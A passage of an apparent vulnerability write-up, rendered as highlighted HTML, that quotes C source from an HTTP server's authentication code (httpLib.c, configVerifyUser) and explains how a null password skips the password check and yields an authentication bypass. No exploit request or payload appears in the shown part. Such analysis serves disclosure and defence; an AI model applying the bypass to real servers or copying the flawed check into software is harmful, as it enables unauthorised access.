class=\"crayon-o\">!<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-33\"><span class=\"crayon-cn\">1718<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-34\"><span class=\"crayon-cn\">1719<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-35\"><span class=\"crayon-cn\">1720<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_AUTH_NO_SESSION<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">noSession<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-36\"><span class=\"crayon-cn\">1721<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpCreateSession<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-37\"><span class=\"crayon-cn\">1722<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* Too many sessions *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-38\"><span class=\"crayon-cn\">1723<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-39\"><span class=\"crayon-cn\">1724<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-40\"><span class=\"crayon-cn\">1725<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpSetSessionVar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_SESSION_USERNAME<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-41\"><span class=\"crayon-cn\">1726<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpSetSessionVar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_SESSION_IP<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-42\"><span class=\"crayon-cn\">1727<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-43\"><span class=\"crayon-cn\">1728<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">authenticated<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-44\"><span class=\"crayon-cn\">1729<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">authenticateProbed<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-45\"><span class=\"crayon-cn\">1730<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sclone<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-46\"><span class=\"crayon-cn\">1731<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">encoded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-47\"><span class=\"crayon-cn\">1732<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-48\"><span class=\"crayon-cn\">1733<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-49\"><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-50\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">File <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">httpLib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span>\u2013<span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">configVerfiyUser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-51\"><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">following <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-e\">first <\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">presence <\/span><span class=\"crayon-i\">of<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">valid <\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">either <\/span><span class=\"crayon-e\">because <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-e\">was <\/span><span class=\"crayon-e\">already <\/span><span class=\"crayon-e\">set <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">because <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-e\">was <\/span><span class=\"crayon-v\">passed<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">since <\/span><span class=\"crayon-e\">we <\/span><span class=\"crayon-e\">are <\/span><span class=\"crayon-e\">able <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">pass<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2031<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-e\">bypass <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">actual <\/span><span class=\"crayon-e\">checks <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">successfully <\/span><span class=\"crayon-e\">authenticate <\/span><span class=\"crayon-e\">reaching <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2055.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-53\"><span class=\"crayon-cn\">2014<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-54\"><span class=\"crayon-c\">2015 Verify the user password for the &#8220;config&#8221; store based on the users defined via configuration directives.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-55\"><span class=\"crayon-c\">2016 Password may be NULL only if using auto-login.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-56\"><span class=\"crayon-c\">2017 *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-57\"><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">configVerifyUser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HttpConn *<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-58\"><span class=\"crayon-cn\">2019<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-59\"><span class=\"crayon-cn\">2020<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpRx *<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-60\"><span class=\"crayon-cn\">2021<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpAuth *<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-61\"><span class=\"crayon-cn\">2022<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-62\"><span class=\"crayon-cn\">2023<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-63\"><span class=\"crayon-cn\">2024<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-64\"><span class=\"crayon-cn\">2025<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-65\"><span class=\"crayon-cn\">2026<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-66\"><span class=\"crayon-cn\">2027<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLookupKey<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">userCache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-67\"><span class=\"crayon-cn\">2028<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;msg: &#8216;Unknown user&#8217;, username:&#8217;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-68\"><span class=\"crayon-cn\">2029<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-69\"><span class=\"crayon-cn\">2030<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-70\"><span class=\"crayon-cn\">2031<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-71\"><span class=\"crayon-cn\">2032<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u0000&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-72\"><span class=\"crayon-cn\">2033<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;error http auth&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;No AuthRealm defined&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-73\"><span class=\"crayon-cn\">2034<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-74\"><span class=\"crayon-cn\">2035<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">passwordDigest<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">passwordDigest<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-75\"><span class=\"crayon-cn\">2036<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sncmp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;BF&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">slen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-76\"><span class=\"crayon-cn\">2037<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-77\"><span class=\"crayon-cn\">2038<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* Blowifsh *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-78\"><span class=\"crayon-cn\">2039<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprCheckPassword<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sfmt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s:%s:%s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-79\"><span class=\"crayon-cn\">2040<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-80\"><span class=\"crayon-cn\">2041<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-81\"><span class=\"crayon-cn\">2042<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">encoded<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-82\"><span class=\"crayon-cn\">2043<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprGetMD5<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sfmt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s:%s:%s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-83\"><span class=\"crayon-cn\">2044<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">encoded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-84\"><span class=\"crayon-cn\">2045<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-85\"><span class=\"crayon-cn\">2046<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">smatch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">)<\/span><span 